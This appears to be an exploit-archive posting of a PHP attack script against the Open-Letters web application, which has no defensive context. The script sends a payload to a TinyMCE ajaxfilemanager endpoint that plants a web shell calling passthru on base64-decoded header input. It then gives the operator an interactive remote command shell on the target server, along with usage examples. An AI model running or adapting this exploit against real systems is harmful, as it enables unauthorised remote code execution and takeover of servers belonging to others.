Home / exploits Open Letters Remote PHP Code Injection
Posted on 22 April 2015
<?php /* OutPut: #[+] Author: TUNISIAN CYBER #[+] Script coded BY: Egidio Romano aka EgiX #[+] Title: Open-Letters Remote PHP Code Injection Vulnerability #[+] Date: 19-04-2015 #[+] Vendor: http://www.open-letters.de/ #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) #[+] CVE: #[+] Twitter: @TCYB3R #[+] Egix's Contact: n0b0d13s[at]gmail[dot]com #[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png OL-shell> */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( " [-] No response from {$host}:80 "); fwrite($sock, $packet); return stream_get_contents($sock); } print "#[+] Author: TUNISIAN CYBER "; print "#[+] Script coded BY: Egidio Romano aka EgiX "; print "#[+] Title: Open-Letters Remote PHP Code Injection Vulnerability "; print "#[+] Date: 19-04-2015 "; print "#[+] Vendor: http://www.open-letters.de/ "; print "#[+] Type: WebAPP "; print "#[+] Tested on: KaliLinux (Debian) "; print "#[+] CVE: "; print "#[+] Twitter: @TCYB3R "; print "#[+] Egix's Contact: n0b0d13s[at]gmail[dot]com "; print "#[+] Proof of concept: http://i.imgur.com/TNKV8Mt.png"; if ($argc < 3) { print " Usage......: php $argv[0] <host> <path>"; print " Example....: php $argv[0] localhost /"; print " Example....: php $argv[0] localhost /zenphoto/ "; die(); } $host = $argv[1]; $path = $argv[2]; $exploit = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}external_scripts/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Content-Length: ".strlen($exploit)." "; $packet .= "Content-Type: application/x-www-form-urlencoded "; $packet .= "Connection: close {$exploit}"; http_send($host, $packet); $packet = "GET {$path}external_scripts/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Cmd: %s "; $packet .= "Connection: close "; while(1) { print " OL-shell> "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die(" [-] Exploit failed! "); } ?>
